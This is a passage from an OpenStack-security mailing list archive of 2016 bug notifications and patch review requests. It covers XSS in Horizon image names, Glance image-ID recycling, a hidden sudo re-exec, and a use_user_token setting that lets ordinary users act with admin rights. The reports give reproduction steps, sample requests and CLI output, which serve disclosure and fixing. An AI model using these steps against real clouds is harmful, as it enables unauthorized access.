https://bugs.launchpad.net/bugs/1623735 Title: Stored XSS in Glance Image Names Status in OpenStack Dashboard (Horizon): New Status in OpenStack Security Advisory: Incomplete Bug description: My team is currently testing Glance with the API security testing tool we've developed (https://github.com/openstack/syntribos), and in the course of testing I discovered a cross-site scripting issue in Horizon stemming from Glance image names. ========================= Request to Glance: POST /v2/images HTTP/1.1 Host: [GLANCE ENDPOINT] Connection: close Accept-Encoding: gzip, deflate Accept: application/json User-Agent: python-requests/2.11.1 Content-Type: application/json X-Auth-Token: [TOKEN] Content-Length: 207 {"protected": false, "name": "", "tags": ["testing"], "container_format": "bare", "disk_format": "raw", "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "visibility": "private"} HTTP/1.1 201 Created Content-Length: 585 Content-Type: application/json; charset=UTF-8 Location: http://[GLANCE ENDPOINT]/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de X-Openstack-Request-Id: req-e7150b2a-9a52-44a0-bd8d-1663dfc95524 Date: Thu, 15 Sep 2016 00:26:57 GMT Connection: close {"status": "queued", "name": "", "tags": ["testing"], "container_format": "bare", "created_at": "2016-09-15T00:26:57Z", "size": null, "disk_format": "raw", "updated_at": "2016-09-15T00:26:57Z", "visibility": "private", "self": "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "min_disk": 0, "protected": false, "id": "0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de", "file": "/v2/images/0b8b0e0d-0ed2-4628-b25d-3e8ce239f6de/file", "checksum": null, "owner": "823c88c894af4aafa0b8f12d2eb8f1be", "virtual_size": null, "min_ram": 0, "schema": "/v2/schemas/image"} ========================= This will percolate into Horizon's list view of Glance images (/admin/images), and result in an alert box popping up (see attached screenshot). To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1623735/+subscriptions From fungi at yuggoth.org Fri Sep 16 00:46:49 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Fri, 16 Sep 2016 00:46:49 -0000 Subject: [Openstack-security] [Bug 1622690] Re: Potential XSS in image create modal or angular table References: <20160912171951.2128.2126.malonedeb@wampee.canonical.com> Message-ID: <20160916004649.1896.83803.launchpad@wampee.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - The Image Create modal allows you to create an image sending unencoded HTML and JavaScript. This could lead to a potential XSS attack Steps to reproduce: 1. Go to project>images 2. Click on "Create image" 3. In the "Image Name" input enter some HTML code or script code (i.e

an HTML element wrapping the text "This is bad"
, ) 4. Fill in other required fields 5. Click on 'Create Image' Expected Result: The image is created but the name is safely encoded and it's shown in the table as it was written Actual Result: The image name is not encoded an therefore is being rendered as HTML by the browser. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622690 Title: Potential XSS in image create modal or angular table Status in OpenStack Dashboard (Horizon): Fix Committed Status in OpenStack Security Advisory: Won't Fix Bug description: The Image Create modal allows you to create an image sending unencoded HTML and JavaScript. This could lead to a potential XSS attack Steps to reproduce: 1. Go to project>images 2. Click on "Create image" 3. In the "Image Name" input enter some HTML code or script code (i.e

an HTML element wrapping the text "This is bad"
, ) 4. Fill in other required fields 5. Click on 'Create Image' Expected Result: The image is created but the name is safely encoded and it's shown in the table as it was written Actual Result: The image name is not encoded an therefore is being rendered as HTML by the browser. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1622690/+subscriptions From tdecacqu at redhat.com Fri Sep 16 01:37:54 2016 From: tdecacqu at redhat.com (Tristan Cacqueray) Date: Fri, 16 Sep 2016 01:37:54 -0000 Subject: [Openstack-security] [Bug 1593799] Re: glance-manage db purge breaks image immutability promise References: <20160617171339.24588.32339.malonedeb@gac.canonical.com> Message-ID: <20160916013755.11804.3744.launchpad@gac.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - Using glance-manage db purge command opens possibility to recycle image- IDs. When the row is deleted from the database the ID is not known by glance anymore and thus it's not unique during the deployment lifecycle. This opens possibility to following scenario: 1) End user boots VM from private/public/shared image. 2) Image owner deletes the image. 3) glance-manage db purge gets ran which deletes record that image has ever existed. 4) Either malicious user or someone unintentionally creates new image with same ID (being same user so having access to the image by owning it or it becoming public/shared(/possbly community at some point)) 5) Same end user boots either snapshot from the original image or nova needs to migrate the VM to another host. Now the user's VM will be rebuilt on top of the new image. Worst case scenario the user had no idea that the image data changed in between. This behavior breaks Glance image immutability promise that has bee stated that the data related to image ID that has gone active will never change. We have two solutions for this. Either we introduce table to track the deleted image-IDs and get glance to cross check that during the image create or we leave it as is but issue notice/documentation what are the implications if the purge is used transferring the responsibility to the cloud operators. This was partially discussed in the virtual glance midcycle meetup so it might not be justified to leave this as private but I wanted to leave that decision to VMT. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1593799 Title: glance-manage db purge breaks image immutability promise Status in Glance: Confirmed Status in OpenStack Security Advisory: Opinion Status in OpenStack Security Notes: Fix Released Bug description: Using glance-manage db purge command opens possibility to recycle image-IDs. 
When the row is deleted from the database the ID is not known by glance anymore and thus it's not unique during the deployment lifecycle. This opens possibility to following scenario: 1) End user boots VM from private/public/shared image. 2) Image owner deletes the image. 3) glance-manage db purge gets ran which deletes record that image has ever existed. 4) Either malicious user or someone unintentionally creates new image with same ID (being same user so having access to the image by owning it or it becoming public/shared(/possbly community at some point)) 5) Same end user boots either snapshot from the original image or nova needs to migrate the VM to another host. Now the user's VM will be rebuilt on top of the new image. Worst case scenario the user had no idea that the image data changed in between. This behavior breaks Glance image immutability promise that has bee stated that the data related to image ID that has gone active will never change. We have two solutions for this. Either we introduce table to track the deleted image-IDs and get glance to cross check that during the image create or we leave it as is but issue notice/documentation what are the implications if the purge is used transferring the responsibility to the cloud operators. This was partially discussed in the virtual glance midcycle meetup so it might not be justified to leave this as private but I wanted to leave that decision to VMT. To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1593799/+subscriptions From lhinds at redhat.com Fri Sep 16 06:43:39 2016 From: lhinds at redhat.com (Luke Hinds) Date: Fri, 16 Sep 2016 06:43:39 -0000 Subject: [Openstack-security] [Bug 1593799] Re: glance-manage db purge breaks image immutability promise References: <20160617171339.24588.32339.malonedeb@gac.canonical.com> Message-ID: <20160916064340.1777.78877.malone@wampee.canonical.com> Thanks Jeremy, I have this noted for next time. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1593799 Title: glance-manage db purge breaks image immutability promise Status in Glance: Confirmed Status in OpenStack Security Advisory: Opinion Status in OpenStack Security Notes: Fix Released Bug description: Using glance-manage db purge command opens possibility to recycle image-IDs. When the row is deleted from the database the ID is not known by glance anymore and thus it's not unique during the deployment lifecycle. This opens possibility to following scenario: 1) End user boots VM from private/public/shared image. 2) Image owner deletes the image. 3) glance-manage db purge gets ran which deletes record that image has ever existed. 4) Either malicious user or someone unintentionally creates new image with same ID (being same user so having access to the image by owning it or it becoming public/shared(/possbly community at some point)) 5) Same end user boots either snapshot from the original image or nova needs to migrate the VM to another host. Now the user's VM will be rebuilt on top of the new image. Worst case scenario the user had no idea that the image data changed in between. This behavior breaks Glance image immutability promise that has bee stated that the data related to image ID that has gone active will never change. We have two solutions for this. 
Either we introduce table to track the deleted image-IDs and get glance to cross check that during the image create or we leave it as is but issue notice/documentation what are the implications if the purge is used transferring the responsibility to the cloud operators. This was partially discussed in the virtual glance midcycle meetup so it might not be justified to leave this as private but I wanted to leave that decision to VMT. To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1593799/+subscriptions From rcresswe at cisco.com Fri Sep 16 08:38:07 2016 From: rcresswe at cisco.com (Rob Cresswell) Date: Fri, 16 Sep 2016 08:38:07 -0000 Subject: [Openstack-security] [Bug 1622690] Re: Potential XSS in image create modal or angular table References: <20160912171951.2128.2126.malonedeb@wampee.canonical.com> Message-ID: <20160916083810.12200.30732.launchpad@gac.canonical.com> ** Changed in: horizon Status: Fix Committed => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622690 Title: Potential XSS in image create modal or angular table Status in OpenStack Dashboard (Horizon): Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: The Image Create modal allows you to create an image sending unencoded HTML and JavaScript. This could lead to a potential XSS attack Steps to reproduce: 1. Go to project>images 2. Click on "Create image" 3. In the "Image Name" input enter some HTML code or script code (i.e

an HTML element wrapping the text "This is bad"
, ) 4. Fill in other required fields 5. Click on 'Create Image' Expected Result: The image is created but the name is safely encoded and it's shown in the table as it was written Actual Result: The image name is not encoded an therefore is being rendered as HTML by the browser. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1622690/+subscriptions From 1605914 at bugs.launchpad.net Sun Sep 18 02:05:37 2016 From: 1605914 at bugs.launchpad.net (Amrith) Date: Sun, 18 Sep 2016 02:05:37 -0000 Subject: [Openstack-security] [Bug 1605914] Re: Hard coded security group References: <20160723182211.8674.89923.malonedeb@soybean.canonical.com> Message-ID: <20160918020540.1777.33013.launchpad@wampee.canonical.com> ** Changed in: trove Assignee: (unassigned) => Amrith (amrith) -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1605914 Title: Hard coded security group Status in OpenStack DBaaS (Trove): Confirmed Bug description: "trove create" also creates a security group, with hard coded values. Some of which is not what I want/need - especially the 'allow everything' rule! Please allow to specify existing SG(s) (preferably plural) on either the command line (preferably), or in the datastore/datastore_version configuration. Or possibly in the datastore section in trove*.conf. To manage notifications about this bug go to: https://bugs.launchpad.net/trove/+bug/1605914/+subscriptions From gerrit2 at review.openstack.org Wed Sep 21 15:01:10 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Wed, 21 Sep 2016 15:01:10 +0000 Subject: [Openstack-security] [openstack/cinder] SecurityImpact review request change Id5f83f69fd3a877459fab924c005047e55f98c7b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/366750 Log: commit c8c1f9a62e854c48c5e480115bc69822496e5950 Author: Kaitlin Farr Date: Wed Sep 7 13:21:33 2016 -0400 Modifies override logic for key_manager Makes the logic for overriding config options for the key_manager more robust. Before this patch, the override logic seemed to be called before the global CONF object has been populated with values from the configuration file. ConfKeyManager, the default for if no value had been specified, would be used to override the value for api_class. Then when CONF was populated with the actual values, the ConfKeyManager override value would still be set. This patch makes the logic a little bit more robust so that the value is only overriden if explicitly passed into the function, not at the global scope outside of the function. SecurityImpact Closes-Bug: 1621109 Change-Id: Id5f83f69fd3a877459fab924c005047e55f98c7b From gerrit2 at review.openstack.org Wed Sep 21 15:02:30 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Wed, 21 Sep 2016 15:02:30 +0000 Subject: [Openstack-security] [openstack/cinder] SecurityImpact review request change Id5f83f69fd3a877459fab924c005047e55f98c7b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/366750 Log: commit b66d4d997cf371d4d451aa9e57d351f4e045fc8d Author: Kaitlin Farr Date: Wed Sep 7 13:21:33 2016 -0400 Modifies override logic for key_manager Makes the logic for overriding config options for the key_manager more robust. 
Before this patch, the override logic seemed to be called before the global CONF object has been populated with values from the configuration file. ConfKeyManager, the default for if no value had been specified, would be used to override the value for api_class. Then when CONF was populated with the actual values, the ConfKeyManager override value would still be set. This patch makes the logic a little bit more robust so that the value is only overriden if explicitly passed into the function, not at the global scope outside of the function. SecurityImpact Closes-Bug: 1621109 Change-Id: Id5f83f69fd3a877459fab924c005047e55f98c7b From 1493448 at bugs.launchpad.net Wed Sep 21 17:04:32 2016 From: 1493448 at bugs.launchpad.net (Mike Fedosin) Date: Wed, 21 Sep 2016 17:04:32 -0000 Subject: [Openstack-security] [Bug 1493448] Re: All operations are perfomed with admin priveleges when 'use_user_token' is False References: <20150908163321.8816.82829.malonedeb@wampee.canonical.com> Message-ID: <20160921170432.24180.11787.malone@gac.canonical.com> "use_user_token" and related glance config options were deprecated in Mitaka: https://review.openstack.org/#/c/237742/ Bug may be closed. ** Changed in: glance Status: Triaged => Fix Released -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1493448 Title: All operations are perfomed with admin priveleges when 'use_user_token' is False Status in Glance: Fix Released Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Security Notes: Fix Released Bug description: In glance-api.conf we have a param called 'use_user_token' which is enabled by default. It was introduced to allow for reauthentication when tokens expire and prevents requests from silently failing. https://review.openstack.org/#/c/29967/ Unfortunately disabling this parameter leads to security issues and allows a regular user to perform any operation with admin rights. Steps to reproduce on devstack: 1. Change /etc/glance/glance-api.conf parameters and restart glance-api: # Pass the user's token through for API requests to the registry. # Default: True use_user_token = False # If 'use_user_token' is not in effect then admin credentials # can be specified. Requests to the registry on behalf of # the API will use these credentials. # Admin user name admin_user = glance # Admin password admin_password = nova # Admin tenant name admin_tenant_name = service # Keystone endpoint auth_url = http://127.0.0.1:5000/v2.0 (for v2 api it's required to enable registry service, too: data_api = glance.db.registry.api) 2. Create a private image with admin user: source openrc admin admin glance --os-image-api-version 1 image-create --name private --is-public False --disk-format qcow2 --container-format bare --file /etc/fstab +------------------+--------------------------------------+ | Property | Value | +------------------+--------------------------------------+ | checksum | e533283e6aac072533d1d091a7d2e413 | | container_format | bare | | created_at | 2015-09-01T22:17:25.000000 | | deleted | False | | deleted_at | None | | disk_format | qcow2 | | id | e0d0bf2f-9f81-4500-ae50-7a1a0994e2f0 | | is_public | False | | min_disk | 0 | | min_ram | 0 | | name | private | | owner | e1cec705e33b4dfaaece11b623f3c680 | | protected | False | | size | 616 | | status | active | | updated_at | 2015-09-01T22:17:27.000000 | | virtual_size | None | +------------------+--------------------------------------+ 3. 
Check the image list with admin user: glance --os-image-api-version 1 image-list +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ | ID | Name | Disk Format | Container Format | Size | Status | +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ | 4a1703e7-72d1-4fce-8b5c-5bb1ef2a5047 | cirros-0.3.4-x86_64-uec | ami | ami | 25165824 | active | | c513f951-e1b0-4acd-8980-ae932f073039 | cirros-0.3.4-x86_64-uec-kernel | aki | aki | 4979632 | active | | de99e4b9-0491-4990-8b93-299377bf2c95 | cirros-0.3.4-x86_64-uec-ramdisk | ari | ari | 3740163 | active | | e0d0bf2f-9f81-4500-ae50-7a1a0994e2f0 | private | qcow2 | bare | 616 | active | +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ 4. Enable demo user and get the image list: source openrc demo demo glance --os-image-api-version 1 image-list +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ | ID | Name | Disk Format | Container Format | Size | Status | +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ | 4a1703e7-72d1-4fce-8b5c-5bb1ef2a5047 | cirros-0.3.4-x86_64-uec | ami | ami | 25165824 | active | | c513f951-e1b0-4acd-8980-ae932f073039 | cirros-0.3.4-x86_64-uec-kernel | aki | aki | 4979632 | active | | de99e4b9-0491-4990-8b93-299377bf2c95 | cirros-0.3.4-x86_64-uec-ramdisk | ari | ari | 3740163 | active | | e0d0bf2f-9f81-4500-ae50-7a1a0994e2f0 | private | qcow2 | bare | 616 | active | +--------------------------------------+---------------------------------+-------------+------------------+----------+--------+ 5. Try to get access to admin's private image with demo user: glance --os-image-api-version 1 image-show private +------------------+--------------------------------------+ | Property | Value | +------------------+--------------------------------------+ | checksum | e533283e6aac072533d1d091a7d2e413 | | container_format | bare | | created_at | 2015-09-01T22:17:25.000000 | | deleted | False | | disk_format | qcow2 | | id | e0d0bf2f-9f81-4500-ae50-7a1a0994e2f0 | | is_public | False | | min_disk | 0 | | min_ram | 0 | | name | private | | owner | e1cec705e33b4dfaaece11b623f3c680 | | protected | False | | size | 616 | | status | active | | updated_at | 2015-09-01T22:17:27.000000 | +------------------+--------------------------------------+ The same happens when demo user wants to create/update/delete any image. v2 with enabled registry backend is affected too. To manage notifications about this bug go to: https://bugs.launchpad.net/glance/+bug/1493448/+subscriptions From fungi at yuggoth.org Wed Sep 21 22:48:25 2016 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 21 Sep 2016 22:48:25 -0000 Subject: [Openstack-security] [Bug 1611171] Re: re-runs self via sudo References: <20160809015520.22289.87995.malonedeb@soybean.canonical.com> Message-ID: <20160921224826.23521.28956.malone@gac.canonical.com> Consensus seems to confirm Tristan's observation this meets the VMT's class D report (security hardening) definition, so I'm marking our advisory task Won't Fix and annotating the bug status and tags accordingly. If the situation is discovered to be explicitly vulnerable after all, we can revisit it at that time. 
** Changed in: ossa Status: Incomplete => Won't Fix ** Information type changed from Public Security to Public ** Tags added: security -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1611171 Title: re-runs self via sudo Status in Cinder: In Progress Status in Designate: In Progress Status in ec2-api: In Progress Status in gce-api: In Progress Status in Manila: In Progress Status in masakari: Fix Released Status in OpenStack Compute (nova): In Progress Status in OpenStack Security Advisory: Won't Fix Status in Rally: In Progress Bug description: Hello, I'm looking through Designate source code to determine if is appropriate to include in Ubuntu Main. This isn't a full security audit. This looks like trouble: ./designate/cmd/manage.py def main(): CONF.register_cli_opt(category_opt) try: utils.read_config('designate', sys.argv) logging.setup(CONF, 'designate') except cfg.ConfigFilesNotFoundError: cfgfile = CONF.config_file[-1] if CONF.config_file else None if cfgfile and not os.access(cfgfile, os.R_OK): st = os.stat(cfgfile) print(_("Could not read %s. Re-running with sudo") % cfgfile) try: os.execvp('sudo', ['sudo', '-u', '#%s' % st.st_uid] + sys.argv) except Exception: print(_('sudo failed, continuing as if nothing happened')) print(_('Please re-run designate-manage as root.')) sys.exit(2) This is an interesting decision -- if the configuration file is _not_ readable by the user in question, give the executing user complete privileges of the user that owns the unreadable file. I'm not a fan of hiding privilege escalation / modifications in programs -- if a user had recently used sudo and thus had the authentication token already stored for their terminal, this 'hidden' use of sudo may be unexpected and unwelcome, especially since it appears that argv from the first call leaks through to the sudo call. Is this intentional OpenStack style? Or unexpected for you guys too? (Feel free to make this public at your convenience.) Thanks To manage notifications about this bug go to: https://bugs.launchpad.net/cinder/+bug/1611171/+subscriptions From gerrit2 at review.openstack.org Fri Sep 23 17:49:28 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Fri, 23 Sep 2016 17:49:28 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/375526 Log: commit 1e804d7705a8398390c8f80ed7be2c9a6806d2c5 Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 CPU and address space limitations on qemu-img info All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 From gerrit2 at review.openstack.org Fri Sep 23 19:01:16 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Fri, 23 Sep 2016 19:01:16 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. 
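As a rough illustration of the resource caps described in the qemu-img change above (a standard-library sketch only; the real change lives in glance's image handling code and the helper name here is made up), the limits can be applied to the child process before exec:

    import resource
    import subprocess

    def limited_qemu_img_info(path):
        def set_limits():
            # Cap CPU time at 2 seconds and address space at 1 GB before
            # exec, so a crafted image cannot make qemu-img spin or balloon.
            resource.setrlimit(resource.RLIMIT_CPU, (2, 2))
            resource.setrlimit(resource.RLIMIT_AS, (1024 ** 3, 1024 ** 3))

        return subprocess.check_output(
            ['qemu-img', 'info', '--output=json', path],
            preexec_fn=set_limits)

If qemu-img exceeds the CPU cap it is killed by the kernel, and if it exceeds the address-space cap its allocations fail, so the caller sees a failed command instead of an exhausted host.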
https://review.openstack.org/375526 Log: commit 1be46ea411bf172876498f840c79cce5ff2f53e7 Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 CPU and address space limitations on qemu-img info All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 From gerrit2 at review.openstack.org Mon Sep 26 16:48:10 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Mon, 26 Sep 2016 16:48:10 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/375526 Log: commit 1daafbcc638fa85a6cb13b6e9a77cdc22f373c84 Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 CPU and address space limitations on qemu-img info All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 From gerrit2 at review.openstack.org Mon Sep 26 17:56:27 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Mon, 26 Sep 2016 17:56:27 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/375526 Log: commit a8cd0c10fd3839e92457b3ade7e1fb9290d9420b Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 Adding constraints around qemu-img calls * All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. * All "qemu-img convert" calls now specify the import format so that it does not have to be inferred by qemu-img. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 From gerrit2 at review.openstack.org Mon Sep 26 18:00:55 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Mon, 26 Sep 2016 18:00:55 +0000 Subject: [Openstack-security] [openstack/cinder] SecurityImpact review request change Id5f83f69fd3a877459fab924c005047e55f98c7b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/376992 Log: commit 96948e48b140a9a47d26bf805230df41a44c9c00 Author: Kaitlin Farr Date: Wed Sep 7 13:21:33 2016 -0400 Modifies override logic for key_manager Makes the logic for overriding config options for the key_manager more robust. Before this patch, the override logic seemed to be called before the global CONF object has been populated with values from the configuration file. ConfKeyManager, the default for if no value had been specified, would be used to override the value for api_class. Then when CONF was populated with the actual values, the ConfKeyManager override value would still be set. This patch makes the logic a little bit more robust so that the value is only overriden if explicitly passed into the function, not at the global scope outside of the function. 
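A minimal sketch of the override behaviour described in the commit message above, assuming an oslo.config option named key_manager/api_class (the option name, default and function name are illustrative, not the exact cinder code):

    from oslo_config import cfg

    CONF = cfg.CONF
    CONF.register_opts(
        [cfg.StrOpt('api_class', default='example.DefaultKeyManager')],
        group='key_manager')

    def key_manager_class(backend=None):
        # Only override the configured value when a backend is explicitly
        # passed in; never push a fallback into CONF at module scope, since
        # CONF may not have been populated from the config file yet.
        if backend is not None:
            CONF.set_override('api_class', backend, group='key_manager')
        return CONF.key_manager.api_class

Callers that pass nothing simply get whatever the configuration file provides once it has been parsed.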
SecurityImpact Closes-Bug: 1621109 Change-Id: Id5f83f69fd3a877459fab924c005047e55f98c7b (cherry picked from commit b66d4d997cf371d4d451aa9e57d351f4e045fc8d) From gerrit2 at review.openstack.org Mon Sep 26 18:28:56 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Mon, 26 Sep 2016 18:28:56 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/375526 Log: commit 69a9b659fd48aa3c1f84fc7bc9ae236b6803d31f Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 Adding constraints around qemu-img calls * All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. * All "qemu-img convert" calls now specify the import format so that it does not have to be inferred by qemu-img. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 From gerrit2 at review.openstack.org Mon Sep 26 19:40:54 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Mon, 26 Sep 2016 19:40:54 +0000 Subject: [Openstack-security] [openstack/cursive] SecurityImpact review request change I8d7f43fb4c0573ac3681147eac213b369bbbcb3b Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/357202 Log: commit b51b8e36ff8127abc1429b05c5e7c14b69f88afb Author: Peter Hamilton Date: Thu Aug 18 08:50:38 2016 -0400 Add certificate validation This change adds support for a certificate trust store. When performing signature verification, all certificates in the trust store are loaded into a certificate verification context. This context is used to validate the signing certificate, verifying that the certificate belongs to a valid certificate chain rooted in the trust store. The signature_utils.get_verifier function is updated to accept an additional, optional parameter: trust_store_path. This parameter should contain a valid filesystem path to the directory acting as the certificate trust store. If not provided, it defaults to None and the trust store will be considered empty. All new certificate utility code is added in a new module named certificate_utils. For more information on this work, see the spec: https://review.openstack.org/#/c/357151/ SecurityImpact DocImpact Change-Id: I8d7f43fb4c0573ac3681147eac213b369bbbcb3b From 1622690 at bugs.launchpad.net Mon Sep 26 20:02:23 2016 From: 1622690 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 26 Sep 2016 20:02:23 -0000 Subject: [Openstack-security] [Bug 1622690] Fix included in openstack/horizon 10.0.0.0rc1 References: <20160912171951.2128.2126.malonedeb@wampee.canonical.com> Message-ID: <20160926200223.18035.49317.malone@wampee.canonical.com> This issue was fixed in the openstack/horizon 10.0.0.0rc1 release candidate. -- You received this bug notification because you are a member of OpenStack Security, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1622690 Title: Potential XSS in image create modal or angular table Status in OpenStack Dashboard (Horizon): Fix Released Status in OpenStack Security Advisory: Won't Fix Bug description: The Image Create modal allows you to create an image sending unencoded HTML and JavaScript. This could lead to a potential XSS attack Steps to reproduce: 1. 
Go to project>images 2. Click on "Create image" 3. In the "Image Name" input enter some HTML code or script code (i.e. markup such as <b>This is bad</b>, or a <script> tag) 4. Fill in other required fields 5. Click on 'Create Image' Expected Result: The image is created but the name is safely encoded and it's shown in the table as it was written Actual Result: The image name is not encoded and therefore is being rendered as HTML by the browser. To manage notifications about this bug go to: https://bugs.launchpad.net/horizon/+bug/1622690/+subscriptions From gerrit2 at review.openstack.org Tue Sep 27 14:23:04 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Tue, 27 Sep 2016 14:23:04 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/377734 Log: commit 6cba6b18a348e8fc2eb4ae25b636d065456a633c Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 Adding constraints around qemu-img calls * All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious images. * All "qemu-img convert" calls now specify the import format so that it does not have to be inferred by qemu-img. SecurityImpact Change-Id: Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Closes-Bug: #1449062 (cherry picked from commit 69a9b659fd48aa3c1f84fc7bc9ae236b6803d31f) From gerrit2 at review.openstack.org Tue Sep 27 14:23:50 2016 From: gerrit2 at review.openstack.org (gerrit2 at review.openstack.org) Date: Tue, 27 Sep 2016 14:23:50 +0000 Subject: [Openstack-security] [openstack/glance] SecurityImpact review request change Ib900bbc05cb9ccd90c6f56ccb4bf2006e30cdc80 Message-ID: Hi, I'd like you to take a look at this patch for potential SecurityImpact. https://review.openstack.org/377736 Log: commit c90830d71969f68768d898c1c178489f602214e2 Author: Hemanth Makkapati Date: Fri Sep 23 09:29:12 2016 -0500 Adding constraints around qemu-img calls * All "qemu-img info" calls are now run under resource limitations that limit CPU time to 2 seconds and address space usage to 1 GB. This helps avoid any DoS attacks via malicious 